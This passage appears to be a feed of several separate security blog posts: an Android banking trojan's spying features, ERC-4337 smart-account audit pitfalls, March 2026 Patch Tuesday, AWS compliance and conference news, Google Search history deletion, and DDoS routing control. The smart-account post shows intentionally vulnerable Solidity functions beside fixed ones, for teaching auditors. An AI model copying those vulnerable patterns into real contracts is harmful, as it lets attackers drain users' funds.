Theft and espionage

In addition to the crypto miner, BeatBanker installs extra modules to spy on the user and rob them at the right moment. The spyware module requests Accessibility Services permission, and if this is granted, begins monitoring everything that’s happening on the smartphone.

If the owner opens the Binance or Trust Wallet app to send USDT, the malware overlays a fake screen on top of the wallet interface, effectively swapping the recipient’s address for its own. All transfers go to the attackers.

The trojan features an advanced remote control system and is capable of executing many other commands:

  • Intercepting one-time codes from Google Authenticator
  • Recording audio from the microphone
  • Streaming the screen in real-time
  • Monitoring the clipboard and intercept keystrokes
  • Sending SMS messages
  • Simulating taps on specific areas of the screen and text input according to a script sent by the attacker, and much more

All of this makes it possible to rob the victim when they use any other banking or payment services — not just crypto payments.

Sometimes victims are infected with a different module for espionage and remote smartphone control — the BTMOB remote access trojan. Its malicious capabilities are even broader, including:

  • Automatic acquisition of certain permissions on Android 13–15
  • Continuous geolocation tracking
  • Access to the front and rear cameras
  • Obtaining PIN codes and passwords for screen unlocking
  • Capturing keyboard input

How to protect yourself from BeatBanker

Cybercriminals are constantly refining their attacks and coming up with new ways to profit from their victims. Despite this, you can protect yourself by following a few simple precautions:

  • Download apps from official sources only, such as Google Play or the app store preinstalled by the vendor. If you find an app while searching the internet, don’t open it via a link from your browser; instead, head to the Google Play app or another branded store on your smartphone to search for it there. While you’re at it, check the number of downloads, the app’s age, and look at the ratings and reviews. Avoid new apps, apps with low ratings, and those with a small number of downloads.
  • Check any permissions you grant. Don’t grant permissions if you’re not sure what they do or why that specific app requires them. Be extra careful with permissions like Install unknown apps, Accessibility, Superuser, and Display over other apps. We’ve written about these in detail in a separate article.
  • Equip your device with a comprehensive anti-malware solution. We, naturally, recommend Kaspersky for Android. Users of Kaspersky products are protected from BeatBanker — detected with the verdicts HEUR:Trojan-Dropper.AndroidOS.BeatBanker and HEUR:Trojan-Dropper.AndroidOS.Banker.*.
  • Regularly update both your operating system and security software. For Kaspersky for Android, which is currently unavailable on Google Play, please review our detailed instructions on installing and updating the app.

Threats to Android users have been going through the roof lately. Check out our other posts on the most relevant and widespread Android attacks and tips for keeping you and your loved ones safe:

  •  

Six mistakes in ERC-4337 smart accounts

Account abstraction transforms fixed “private key can do anything” models into programmable systems that enable batching, recovery and spending limits, and flexible gas payment. But that programmability introduces risks: a single bug can be as catastrophic as leaking a private key.

After auditing dozens of ERC‑4337 smart accounts, we’ve identified six vulnerability patterns that frequently appear. By the end of this post, you’ll be able to spot these issues and understand how to prevent them.

How ERC-4337 works

Before we jump into the common vulnerabilities that we often encounter when auditing smart accounts, here’s the quick mental model of how ERC-4337 works. There are two kinds of accounts on Ethereum: externally owned accounts (EOAs) and contract accounts.

  • EOAs are simple key-authorized accounts that can’t run custom logic. For example, common flows like token interactions require two steps (approve/permit, then execute), which fragments transactions and confuses users.

  • Contract accounts are smart contracts that can enforce rules, but cannot initiate transactions on their own.

Before account abstraction, if you wanted wallet logic like spending limits, multi-sig, or recovery, you’d deploy a smart contract wallet like Safe. The problem was that an EOA still had to kick off every transaction and pay gas in ETH, so in practice, you were juggling two accounts: one to sign and one to hold funds.

ERC-4337 removes that dependency. The smart account itself becomes the primary account. A shared EntryPoint contract and off-chain bundlers replace the EOA’s role, and paymasters let you sponsor gas or pay in tokens instead of ETH.

Here’s how ERC-4337 works:

  • Step 1: The user constructs and signs a UserOperation off-chain. This includes the intended action (callData), a nonce, gas parameters, an optional paymaster address, and the user’s signature over the entire message.

  • Step 2: The signed UserOperation is sent to a bundler (think of it as a specialized relayer). The bundler simulates it locally to check it won’t fail, then batches it with other operations and submits the bundle on-chain to the EntryPoint via handleOps.

  • Step 3: The EntryPoint contract calls validateUserOp on the smart account, which verifies the signature is valid and that the account can cover the gas cost. If a paymaster is involved, the EntryPoint also validates that the paymaster agrees to sponsor the fees.

  • Step 4: Once validation passes, the EntryPoint calls back into the smart account to execute the actual operation. The following figure shows the EntryPoint flow diagram from ERC-4337:

Figure 1: EntryPoint flow diagram from ERC-4337
Figure 1: EntryPoint flow diagram from ERC-4337

If you’re not already familiar with ERC-4337 or want to dig into the details we’re glossing over here, it’s worth reading through the full EIP. The rest of this post assumes you’re comfortable with the basics.

Now that we’ve covered the ERC-4337 attack surface, let’s explore the common vulnerability patterns we encounter in our audits.

1. Incorrect access control

If anyone can call your account’s execute function (or anything that moves funds) directly, they can do anything with your wallet. Only the EntryPoint contract should be allowed to trigger privileged paths, or a vetted executor module in ERC-7579.

A vulnerable implementation allows anyone to drain the wallet:

function execute(address target, uint256 value, bytes calldata data) external {
 (bool ok,) = target.call{value: value}(data);
 require(ok, "exec failed");
}
Figure 2: Vulnerable execute function

While in a safe implementation, the execute function is callable only by entryPoint:

address public immutable entryPoint;

function execute(address target, uint256 value, bytes calldata data)
 external
{
 require(msg.sender == entryPoint, "not entryPoint");
 (bool ok,) = target.call{value: value}(data);
 require(ok, "exec failed");
}
Figure 3: Safe execute function

Here are some important considerations for access control:

  • For each external or public function, ensure that the proper access controls are set.

  • In addition to the EntryPoint access control, some functions need to restrict access to the account itself. This is because you may frequently want to call functions on your contract to perform administrative tasks like module installation/uninstallation, validator modifications, and upgrades.

2. Incomplete signature validation (specifically the gas fields)

A common and serious vulnerability arises when a smart account verifies only the intended action (for example, the callData) but omits the gas-related fields:

  • preVerificationGas

  • verificationGasLimit

  • callGasLimit

  • maxFeePerGas

  • maxPriorityFeePerGas

All of these values are part of the payload and must be signed and checked by the validator. Since the EntryPoint contract computes and settles fees using these parameters, any field that is not cryptographically bound to the signature and not sanity-checked can be altered by a bundler or a frontrunner in transit.

By inflating these values (for example, preVerificationGas, which directly reimburses calldata/overhead), an attacker can cause the account to overpay and drain ETH. preVerificationGas is the portion meant to compensate the bundler for work outside validateUserOp, primarily calldata size costs and fixed inclusion overhead.

We use preVerificationGas as the example because it’s the easiest lever to extract ETH: if it isn’t signed or strictly validated/capped, someone can simply bump that single number and get paid more, directly draining the account.

Robust implementations must bind the full UserOperation, including all gas fields, into the signature, and so enforce conservative caps and consistency checks during validation.

Here’s an example of an unsafe validateUserOp function:

function validateUserOp(UserOperation calldata op, bytes32 /*hash*/, uint256 /*missingFunds*/)
 external
 returns (uint256 validationData)
{
 // Only checks that the calldata is “approved”
 require(_isApprovedCall(op.callData, op.signature), "bad sig");
 return 0;
}
Figure 4: Unsafe validateUserOp function

And here’s an example of a safe validateUserOp function:

function validateUserOp(UserOperation calldata op, bytes32 userOpHash, uint256 /*missingFunds*/)
 external
 returns (uint256 validationData)
{
 require(_isApprovedCall(userOpHash, op.signature), "bad sig");
 return 0;
}
Figure 5: Safe validateUserOp function

Here are some additional considerations:

  • Ideally, use the userOpHash sent by the Entrypoint contract, which includes the gas fields by spec.

  • If you must allow flexibility, enforce strict caps and reasonability checks on each gas field.

3. State modification during validation

Writing state in validateUserOp and then using it during execution is dangerous since the EntryPoint contract validates all ops in a bundle before executing any of them. For example, if you cache the recovered signer in storage during validation and later use that value in execute, another op’s validation can overwrite it before yours runs.

contract VulnerableAccount {
 address public immutable entryPoint;
 address public owner1;
 address public owner2;

 address public pendingSigner;

 modifier onlyEntryPoint() { require(msg.sender == entryPoint, "not EP"); _; }

 function validateUserOp(UserOperation calldata op, bytes32 userOpHash, uint256)
 external
 returns (uint256)
 {
 address signer = recover(userOpHash, op.signature);
 require(signer == owner1 || signer == owner2, "unauthorized");
 // DANGEROUS: persists signer; can be clobbered by another validation
 pendingSigner = signer;
 return 0;
 }

 // Later: appends signer into the call; may use the WRONG (overwritten) signer
 function executeWithSigner(address target, uint256 value, bytes calldata data) external onlyEntryPoint {
 bytes memory payload = abi.encodePacked(data, pendingSigner);
 (bool ok,) = target.call{value: value}(payload);
 require(ok, "exec failed");
 }
}
Figure 6: Vulnerable account that change the state of the account in the validateUserOp function

In Figure 6, one of the two owners can validate a function, but use the other owner’s address in the execute function. Depending on how the execute function is supposed to work in that case, it can be an attack vector.

Here are some important considerations for state modification:

  • Avoid modifying the state of the account during the validation phase.

  • Remember batch semantics: all validations run before any execution, so any “approval” written in validation can be overwritten by a later op’s validation.

  • Use a mapping keyed by userOpHash to persist temporary data, and delete it deterministically after use, but prefer not persisting anything at all.

4. ERC‑1271 replay signature attack

ERC‑1271 is a standard interface for contracts to validate signatures so that other contracts can ask a smart account, via isValidSignature(bytes32 hash, bytes signature), whether a particular hash has been approved.

A recurring pitfall, highlighted by security researcher curiousapple (read the post-mortem here), is to verify that the owner signed a hash without binding the signature to the specific smart account and the chain. If the same owner controls multiple smart accounts, or if the same account exists across chains, a signature created for account A can be replayed against account B or on a different chain.

The remedy is to use EIP‑712 typed data so the signature is domain‑separated by both the smart account address (as verifyingContract) and the chainId.

At a minimum, the signed payload must include the account and chain so that a signature cannot be transplanted across accounts or networks. A robust pattern is to wrap whatever needs authorizing inside an EIP‑712 struct and recover against the domain; this automatically binds the signature to the correct account and chain.

function isValidSignature(bytes32 hash, bytes calldata sig)
 external
 view
 returns (bytes4)
{
 // Replay issue: recovers over a raw hash,
 // not bound to this contract or chainId.
 return ECDSA.recover(hash, sig) == owner ? MAGIC : 0xffffffff;
}
Figure 7: Example of a vulnerable implementation of EIP-1271
function isValidSignature(bytes32 hash, bytes calldata sig)
 external
 view
 returns (bytes4)
{
 bytes32 structHash = keccak256(abi.encode(TYPEHASH, hash));
 bytes32 digest = _hashTypedDataV4(structHash);
 return ECDSA.recover(digest, sig) == owner ? MAGIC : 0xffffffff;
}
Figure 8: Safe implementation of EIP-1271

Here are some considerations for ERC-1271 signature validations:

  • Always verify EIP‑712 typed data so the domain binds signatures to chainId and the smart account address.

  • Enforce exact ERC‑1271 magic value return (0x1626ba7e) on success; anything else is failure.

  • Test negative cases explicitly: same signature on a different account, same signature on a different chain, and same signature after nonce/owner changes.

5. Reverts don’t save you in ERC‑4337

In ERC-4337, once validateUserOp succeeds, the bundler gets paid regardless of whether execution later reverts. This is the same model as normal Ethereum transactions, where miners collect fees even on failed txs, so planning to “revert later” is not a safety net. The success of validateUserOp commits you to paying for gas.

This has a subtle consequence: if your validation is too permissive and accepts operations that will inevitably fail during execution, a malicious bundler can submit those operations repeatedly, each time collecting gas fees from your account without anything useful happening.

A related issue we’ve seen in audits involves paymasters that pay the EntryPoint from a shared pool during validateUserOp, then try to charge the individual user back in postOp. The problem is that postOp can revert (bad state, arithmetic errors, risky external calls), and a revert in postOp does not undo the payment that already happened during validation. An attacker can exploit this by repeatedly passing validation while forcing postOp failures by withdrawing his ETH from the pool during the execution of the userOp, for example, and draining the shared pool.

The robust approach is to never rely on postOp for core invariants. Debit fees from a per-user escrow or deposit during validation, so the money is secured before execution even begins. Treat postOp as best-effort bookkeeping: keep it minimal, bounded, and designed to never revert.

Here are some important considerations for ERC-4337:

  • Make postOp minimal and non-reverting: avoid external calls and complex logic, and instead treat it as best-effort bookkeeping.

  • Test both success and revert paths. Consider that once the validateUserOp function returns a success, the account will pay for the gas.

6. Old ERC‑4337 accounts vs ERC‑7702

ERC‑7702 allows an EOA to temporarily act as a smart account by activating code for the duration of a single transaction, which effectively runs your wallet implementation in the EOA’s context. This is powerful, but it opens an initialization race. If your logic expects an initialize(owner) call, an attacker who spots the 7702 delegation can frontrun with their own initialization transaction and set themselves as the owner. The straightforward mitigation is to permit initialization only when the account is executing as itself in that 7702‑powered call. In practice, require msg.sender == address(this) during initialization.

function initialize(address newOwner) external {
 // Only callable when the account executes as itself (e.g., under 7702)
 require(msg.sender == address(this), "init: only self");
 require(owner == address(0), "already inited");
 owner = newOwner;
}
Figure 9: Example of a safe initialize function for an ERC-7702 smart account

This works because, during the 7702 transaction, calls executed by the EOA‑as‑contract have msg.sender == address(this), while a random external transaction cannot satisfy that condition.

Here are some important considerations for ERC-7702:

  • Require msg.sender == address(this) and owner == address(0) in initialize; make it single‑use and impossible for external callers.

  • Create separate smart accounts for ERC‑7702–enabled EOAs and non‑7702 accounts to isolate initialization and management flows.

Quick security checks before you ship

Use this condensed list as a pre-merge gate for every smart account change. These checks block some common AA failures we see in audits and production incidents. Run them across all account variants, paymaster paths, and gas configurations before you ship.

  • Use the EntryPoint’s userOpHash for validation.

  • Restrict execute/privileged functions to EntryPoint (and self where needed).

  • Keep validateUserOp stateless: don’t write to storage.

  • Force EIP‑712 for ERC‑1271 and other signed messages.

  • Make postOp minimal, bounded, and non‑reverting.

  • For ERC‑7702, allow init only when msg.sender == address(this), once.

  • Add multiple end-to-end tests on success and revert paths.

If you need help securely implementing smart accounts, contact us for an audit.

  •  

March 2026 Patch Tuesday fixes two zero-day vulnerabilities

Microsoft releases important security updates on the second Tuesday of every month, known as Patch Tuesday. This month’s update fixes 79 Microsoft CVEs including two zero-day vulnerabilities.

Microsoft defines a zero-day as “a flaw in software for which no official patch or security update is available yet.” So, since the patch is now available, those two are no longer zero-days. There is also no reason to believe they were ever actively exploited.

But let’s have a look at the possible consequences if you don’t install the update.

The vulnerability tracked as CVE-2026-21262 (CVSS score 8.8 out of 10) is a bug in Microsoft SQL Server that lets a logged-in user quietly climb the privilege ladder and potentially become a full database administrator (sysadmin). With that level of control, they can read, change, or delete data, create new accounts, and tamper with database configurations or jobs. Where SQL Server is supposed to check what each user is allowed to do, in this case it can be tricked into granting more power than intended.

There is no user interaction required once the attacker has that foothold: exploitation can happen over the network using crafted SQL requests that abuse the flawed permission checks. In a typical real‑world scenario, this bug would be the second act in an attack chain: first get in with low privileges, then use CVE-2026-21262 to quietly promote yourself to database king and start rewriting the script.

CVE-2026-26127 (CVSS score 7.5 out of 10) is a bug in Microsoft’s .NET platform that lets an attacker remotely crash .NET applications, effectively taking them offline for a while. The flaw lives in Microsoft .NET 9.0 and 10.0, across Windows, macOS, and Linux, in the .NET runtime or libraries, not in a specific app. In other words, it’s a bug in the engine that runs .NET code, so any app created with affected .NET versions could be at risk until patched.

The main outcome is denial of service: an attacker can cause targeted .NET processes to crash or become unstable, leading to downtime or degraded performance. For a public‑facing web API, a payment service, or any line‑of‑business app built on .NET, this can mean real‑world outages and angry users while services are repeatedly knocked over.

Vulnerabilities affecting Microsoft Office users are two remote code execution flaws in Microsoft Office (CVE-2026-26110 and CVE-2026-26113) which can both be exploited via the preview pane, and a Microsoft Excel information disclosure flaw (CVE-2026-26144), which could be used to exfiltrate data via Microsoft Copilot. Office vulnerabilities appear regularly in Patch Tuesday releases, and in this case none have been reported as actively exploited.

How to apply fixes and check if you’re protected

These updates fix security problems and keep your Windows PC protected. Here’s how to make sure you’re up to date:

1. Open Settings

  • Click the Start button (the Windows logo at the bottom left of your screen).
  • Click on Settings (it looks like a little gear).

2. Go to Windows Update

  • In the Settings window, select Windows Update (usually at the bottom of the menu on the left).

3. Check for updates

  • Click the button that says Check for updates.
  • Windows will search for the latest Patch Tuesday updates.
  • If you have selected to get the latest updates as soon as they’re available, you may see this under More options.
  • In which case you may see a Restart required message. Restart your system and the update will complete.
    Restart now to apply patches
  • If not, continue with the steps below.

4. Download and Install

  • If updates are found, they’ll start downloading right away. Once complete, you’ll see a button that says Install or Restart now.
  • Click Install if needed and follow any prompts. Your computer will usually need a restart to finish the update. If it does, click Restart now.
    Windows up to date

5. Double-check you’re up to date

  • After restarting, go back to Windows Update and check again. If it says You’re up to date, you’re all set!

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

  •  

AWS European Sovereign Cloud achieves first compliance milestone: SOC 2 and C5 reports plus seven ISO certifications

In January 2026, we announced the general availability of the AWS European Sovereign Cloud, a new, independent cloud for Europe entirely located within the European Union (EU), and physically and logically separate from all other AWS Regions. The unique approach of the AWS European Sovereign Cloud provides the only fully featured, independently operated sovereign cloud backed by strong technical controls, sovereign assurances, and legal protections designed to meet the sensitive data needs of European governments and enterprises.

One of the foundational components of how AWS European Sovereign Cloud enables verifiable trust of technical controls and delivers assurance is through our compliance programs and assurance frameworks. These programs help customers understand the robust controls in place at AWS European Sovereign Cloud to maintain security and compliance of the cloud. To meet the needs of our customers, we committed that the AWS European Sovereign Cloud will maintain key certifications such as ISO/IEC 27001:2022, System and Organization Controls (SOC) reports, and Cloud Computing Compliance Criteria Catalogue (C5) attestation, all validated regularly by independent auditors to assure our controls are designed appropriately, operate effectively, and can help customers satisfy their compliance obligations.

Today, AWS European Sovereign Cloud is pleased to announce that SOC 2 and C5 Type 1 attestation reports, along with seven key ISO certifications (ISO 27001:2022, 27017:2015, 27018:2019, 27701:2019, 22301:2019, 20000-1:2018, and 9001:2015) are now available. These attestation reports and certifications cover 69 AWS services operating within the AWS European Sovereign Cloud, and this achievement marks a pivotal first step in our journey to establish the AWS European Sovereign Cloud as a trusted and compliant cloud for European organizations. By securing these foundational certifications and attestation reports early in our implementation, we are demonstrating our commitment to earning customer trust. AWS European Sovereign Cloud customers in Germany and across Europe can now run their applications with enhanced assurance and confidence that our infrastructure aligns with internationally recognized security standards and the AWS European Sovereign Cloud: Sovereign Reference Framework (ESC-SRF). These certifications and attestation reports provide independent validation of our security controls and operational practices, demonstrating our commitment to meeting the heightened expectations towards cloud service providers. Beyond compliance, these certifications and reports help customers meet regulatory requirements and innovate with confidence.

SOC 2 Type 1 report

SOC reports are independent third-party examinations that show how AWS European Sovereign Cloud meets compliance controls and sovereignty objectives. The AWS European Sovereign Cloud SOC 2 report addresses three critical AICPA Trust Services Criteria: Security, Availability, and Confidentiality and includes internal controls mapped to the ESC-SRF. The ESC-SRF establishes sovereignty criteria across key domains including governance independence, operational control, data residency, and technical isolation. As part of the SOC 2 Type 1 attestation, independent third-party auditors have validated suitability of the design and implementation of our controls addressing measures such as independent European Union (EU) corporate structures, operation by EU-resident AWS personnel, strict residency requirements for Customer Content and Customer-Created Metadata, and separation from all other AWS Regions. The ESC-SRF controls in our SOC 2 report show customers how AWS delivers on its sovereignty commitments.

C5 Type 1 report

C5 is a German Government-backed attestation scheme introduced in Germany by the Federal Office for Information Security (BSI) and represents one of the most comprehensive cloud security standards in Europe. The AWS European Sovereign Cloud C5 Type 1 report provides customers with independent third-party attestation on the suitability of the design and implementation of our controls to meet both C5 basic criteria and C5 additional criteria.

The basic criteria establish fundamental security requirements for cloud service providers, covering areas such as organization of information security, human resources security, asset management, access control, cryptography, physical security, operations security, communications security, system acquisition and development, supplier relationships, incident management, business continuity, and compliance. The additional criteria address enhanced requirements for handling sensitive data and critical applications, making this attestation particularly valuable for AWS European Sovereign Cloud customers with stringent data security and sovereignty requirements.

Key ISO certifications

AWS European Sovereign Cloud has achieved seven key ISO certifications that collectively demonstrate comprehensive operational excellence:

These certifications confirm that AWS European Sovereign Cloud has integrated rigorous security, privacy, continuity, service delivery, and quality programs into a comprehensive framework, helping to ensure sensitive information remains secure, services remain available, and operations meet the highest standards through systematic risk management processes and continuous improvement practices.

How to access the reports

To access SOC 2, C5 reports and ISO certifications, customers should sign in to their AWS European Sovereign Cloud account and navigate to AWS Artifact in the AWS Management Console. AWS Artifact is a self-service portal that provides on-demand access to AWS compliance reports and certifications.

We recognize that compliance is not a destination but a continuous journey, and these initial SOC 2, C5 reports and ISO certifications represent the beginning of our certification portfolio. They lay the essential groundwork upon which we will continue to build to meet AWS European Sovereign Cloud customers’ compliance needs as they continue to evolve. As we expand our compliance coverage in the months ahead, customers can be confident that security, transparency, and regulatory alignment have been part of the very DNA of the AWS European Sovereign Cloud design from day one. To learn more about our compliance and security programs, visit AWS European Sovereign Cloud Compliance, or reach out to your AWS European Sovereign Cloud account team.

Security and compliance is a shared responsibility between AWS European Sovereign Cloud and the customer. For more information, see the AWS Shared Security Responsibility Model.

If you have feedback about this post, submit comments in the Comments section below.

Julian Herlinghaus

Julian Herlinghaus

Julian is a Manager in AWS Compliance & Security Assurance based in Berlin, Germany. He is the third-party audit program lead for EMEA and has worked on compliance and assurance for the AWS European Sovereign Cloud. He previously worked as an information security department lead of an accredited certification body and has multiple years of experience in information security and security assurance and compliance.

Tea Jioshvili

Tea Jioshvili

Tea is a Manager in AWS Compliance & Security Assurance based in Berlin, Germany. She leads various third-party audit programs across Europe. She previously worked in security assurance and compliance, business continuity, and operational risk management in the financial industry for 20 years.

Atul Patil

Atulsing Patil
Atulsing is a Compliance Program Manager at AWS. He has 29 years of consulting experience in information technology and information security management. Atulsing holds a Master of Science in Electronics degree and professional certifications such as CCSP, CISSP, CISM, ISO 42001 Lead Auditor, ISO 27001 Lead Auditor, HITRUST CSF, Archer Certified Consultant, and AWS CCP.

  •  

Security is a team sport: AWS at RSAC 2026 Conference

The RSAC 2026 Conference brings together thousands of professionals, practitioners, vendors, and associations to discuss issues covering the entire spectrum of cybersecurity—a place where innovation meets collaboration and the industry’s brightest minds converge to shape its future. This March, Amazon Web Services (AWS) returns to the annual RSAC Conference in San Francisco to share how unifying security and data empowers teams to protect AI-driven workloads while maximizing existing security investments.

Experience innovation at the AWS booth

Visit us at booth S-0466 in South Expo to experience three interactive demo kiosks:

  • The AWS Security Solutions kiosk features live demonstrations of AWS security services including new launches showcasing the latest cloud security innovations and how they work with partner solutions to provide comprehensive protection for your organization. Meet with AWS Security Specialists to discuss your specific security challenges.
  • The AWS Security Partners kiosk showcases live demos from more than 20 AWS Partners showcasing how these partners integrate seamlessly with AWS to address your most critical security challenges.
  • The Humanoid Security Guardian kiosk offers an interactive AI-powered experience that generates customized well-architected framework guides, delivered through QR code for implementation reference.

Partner Passport program: Stop by the AWS booth to pick up your playbook to start exploring integrated AWS Partner security solutions across the show floor. Visit participating partner booths throughout the conference to learn about joint solutions that combine AWS infrastructure with partner innovations. After you’ve received all partner booth visit stamps, you’ll receive AWS swag and entry into a daily raffle to win an exclusive prize.

Beyond the booth: Deep dive sessions and hands-on workshops

AWS security experts will be sharing insights across four sessions throughout RSAC 2026 Conference. These sessions cover the most pressing challenges in AI security, from privacy-by-design principles to preparing for AI-native incidents. Don’t miss learning directly from AWS experts in these sessions.

Privacy by Design in the AI Era | Reserve a seat
Monday, March 23, 2026 | 8:30 AM–9:20 AM PDT
Attendees will learn how to design AI systems with privacy embedded from the start. This session will cover data minimization strategies, architectural patterns for consent-aware decision-making, and practical approaches for building privacy-respecting AI in dynamic environments. Speakers: Juan David Alvares Builes, Senior Security Consultant, Amazon Web Services and Zully Romero, Security and Solutions Architect, Bancolombia.

Trusted Identity Propagation for Autonomous Agents Across Cloud & SaaS | Reserve a seat
Monday, March 23, 2026 | 9:40 AM–10:30 AM PDT
This session will explore trusted identity propagation for autonomous agents across cloud, SaaS, and multi-domain environments. Compare AWS, Azure, Apple, and Cloudflare approaches, focusing on identity continuity, credential management, and privacy-aware designs for secure, agent-driven enterprise systems. Speakers: Swara Gandhi, Senior Solutions Architect, Amazon Web Services and Vijeth Lomada, Lead AI Engineer, Adobe.

How to Secure Containerized Applications from Supply Chain Attacks | Reserve a seat
Monday, March 23, 2026 | 1:10 PM–2:00 PM PDT
Software supply chain attacks target development pipelines to inject malicious code into container images and dependencies. This session demonstrates how to secure containerized applications through automated scanning, Software Bill of Materials (SBOM) generation, and image signing. Learn to implement security controls in CI/CD pipelines using open-source and commercial solutions. Speakers: Patrick Palmer, Principal Security, Solutions Architect, Amazon Web Services and Monika Vu Minh, Quantitative Technologist, Qube Research & Technologies

From Prompt to Pager: Preparing for AI-Native Incidents Now | Reserve a seat
Wednesday, March 25, 2026 | 1:15 PM–2:05 PM PDT
AI incidents start as prompts and end as actions like code edits, SQL writes, workflow changes, yet most playbooks are not ready. This talk will explain why AI incidents differ, show where classic guardrails miss, and share field-tested steps to prepare now: log model-generated actions, add pre/post-conditions, capture provenance, limit blast radius, and rehearse one AI-native scenario. Speaker: Aviral Srivastava, Security Engineer, Amazon

AWS activities and events

AWS will host events at Cloud Village, an interactive community space where security practitioners explore offensive and defensive cloud security through hands-on activities, technical talks, and collaborative discussions. AWS is hosting two technical workshops that provide hands-on practical skills security teams can implement immediately. AWS has also crafted multiple capture the flag (CTF) community challenges at both RSAC 2026 Conference and BSidesSF that advance the broader security community’s capabilities – built by the same team behind the AWS Vulnerability Disclosure Program, where researchers can responsibly report security concerns directly to AWS. Cloud Village will be located in Moscone South, Level 2, Room 204 and is open to All Access Pass and Expo Plus Pass holders.

Finally, you can also join us at a customer soiree AWS is co-hosting with CrowdStrike, on Wednesday, March 25 at The Mint, for an evening of discovery, where artists, thinkers, and leaders gather to challenge convention, shape the future and have some fun. Register to join us

If you’re looking for opportunities for meaningful connections across the security community, AWS is hosting several events including;

Join us in San Francisco

Whether you’re exploring how to secure AI workloads, seeking to unify security across distributed environments, or looking to optimize your security data strategy, the AWS team at RSAC 2026 Conference is ready to collaborate. Visit booth S-0466 in South Expo, attend our technical workshops at the Cloud Village, or join AWS-led sessions. You can also schedule time to meet with AWS experts for more in-depth discussions. Together, we’ll demonstrate that when it comes to cybersecurity, we’re all on the same team.

Learn more about AWS Security solutions at aws.amazon.com/security
See you in San Francisco, March 23–26, 2026.

Idaliz Seymour Idaliz Seymour
Idaliz is a Product Marketing Manager at AWS Security, specializing in helping organizations understand the value of network and application protection in the cloud. In her free time, you’ll find her reading or boxing.
  •  

How to see your Google Search history (and delete it)

Your Google Search history provides one of the most detailed windows into your private life, and I know this because when I looked at my own search history last year, I was overwhelmed by the information buried within.

Across just 18 months, Google tracked the 8,079 searches I made and the 3,050 websites I visited because of those searches. That included my late-night perusal of WebMD because of medical symptoms I’d looked up just seconds before, my tour of Goodwill donation sites as I searched for where to drop off clothes ahead of an upcoming move, and my ironically tracked visit to a Reddit thread titled “How do I delete most, if not all, of my info off of the Internet?” (One answer I learned: Don’t use Google Search.)

Google tracked my every question, concern, and flight of fancy—almost literally. On just one day in August 2025, Google recorded the seven flight searches I made on Google Flights and the six hotel searches I made on Google Travel.

Google also recorded the many questions and requests I made when researching topics for the Lock and Code podcast, which I host. And while all of that Google data made for an interesting investigation into what Google knows about me (which you can listen to below), it also made it clear that more people should know how to access this same information.

For most Google users, if Web & App Activity is turned on, Google is saving what they look up, what time they looked it up, and what websites they clicked on as a result. There are ways to turn that data tracking off, but the first step is to know where to look.

Here’s how to do that.

How to find your Google Search history

You can start by opening your web browser and signing into Google’s centralized hub for your data online at myactivity.google.com.

My Google Activity
The My Google Activity home page

Once logged in, you’ll see the above welcome screen with quick settings that you can change, if you want to. Those settings are different for some users, but may include:

  • Web & App Activity
  • Timeline
  • Play History
  • YouTube History

Further down on the page, you can browse through your Google Search history. (Our screenshot gallery below can help walk you through the steps.)

  • First, look for the search bar in the welcome screen that says Search your activity.
  • Right below, you will find the words Filter by date & product. These words are clickable. Click them.
  • Once you’ve clicked Filter by date & product, you’ll see a pop-up menu where you can look through your Google activity by date or product. Instead of focusing on the date, scroll down through the list of Google products and check the box for Google Search.
  • Press Apply.
  • Find the search bar in the My Google Activity homepage
  • Click on the words “Filter by date & product”
  • Scroll down through the list of items until you find Google Search
  • Click on the Google Search checkbox and click “Apply”

After you press Apply, you’ll be taken to a webpage that lists your Google Search history in reverse chronological order, showing you your most recent activity first. As you scroll down, you can find older activity. You can also use the search bar at the top of the page to look for individual pieces of activity, like a search or series of searches that you previously made.

From here, you can also delete individual Google Search entries so that Google no longer stores that data. This will only apply to the individual search you made.

  • You can delete individual searches by clicking the “X” button in the top right corner of each search record
  • Confirm your deletion by pressing “Delete”
  • Your search is now no longer tied to your overall Google activity

If you want to better protect your privacy, making targeted deletions from your Google Search history is a difficult, lengthy, and imperfect method. Instead, you can simply tell Google to stop recording any of your searches from now on.

How to turn off Google Search history

There’s a simple way to instruct Google to stop saving your online searches to your Google Account, and it takes just a few clicks. Follow the instructions below, along with the image gallery, for guidance.

  • Go to your My Google Activity homepage (this is the same page you saw when first signing into myactivity.google.com)
  • Click on that quick control button we saw earlier: Web & App Activity
  • From here, you will see a new screen with the title Activity Controls
  • Find the button that says Turn off and click it
  • Choose between Turn off and Turn off and delete activity
  • Find the “Turn off” button from the Activity Controls webpage
  • You can choose one of two options for turning off your data
  • With one click, you can stop Google from recording your activity

If you selected Turn off, you’re done. Google will no longer save your Google Searches as part of your overall Google profile activity. This option means that Google still has your prior searches recorded, though. So, if you want, you can choose the second option, Turn off and delete activity.

When you select that option, Google will walk you through additional steps to choose what types of data you want erased, such as past activity tied to Google Search, Maps, Ads, Image Search, Google Play Store, Help and other services. All of these options reveal just how many products and pipelines Google has built to vacuum up your data.

Don’t be overwhelmed, though. Go through the list at your own pace and start making decisions about your data that are right for you.


We don’t just report on data privacy—we help you remove your personal information

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.

  •  

When your DDoS mitigation provider goes down: Why traffic control can’t be outsourced

Since the headline-grabbing outages of 2021, we’ve had recurring conversations with large enterprises asking some version of the same question.

Do we really want our CDN, security, and routing control to live in the same place?

This issue of control has become more urgent after a series of well‑publicized, multi‑hour outages across major cloud‑based DDoS protection and security platforms. These incidents are rare but appear to be increasing in frequency. And when they happen, they expose architectural decisions many organisations haven’t revisited in years. The fact is that architectures assumed providers would never fail. Reality proved them wrong.

The concern isn’t whether cloud DDoS mitigation works. At scale, it does. The issue is control: whether customers retain the ability to reroute traffic independently if the provider itself goes down.

Many DDoS protection services simplify onboarding by originating customer prefixes and returning traffic via static paths. Under normal conditions, this works. During a provider outage, especially one affecting routing or orchestration, customers may lose the ability to reroute traffic
independently. Recovery depends on provider‑side changes at the worst possible moment.

That’s when a DDoS mitigation service can become a single point of failure.

Protection and control are different problems

One thing we consistently hear from network and security teams is that DDoS attack mitigation and traffic control are often treated as the same problem. They aren’t.

Resilient architectures separate them:

Function Who Should Control It
Attack mitigation DDoS provider
Traffic routing decisions Customer network

The Internet already provides a mechanism to enforce this separation: the Border Gateway Protocol (BGP). This is the Internet’s routing protocol; it determines how traffic is directed between the networks.

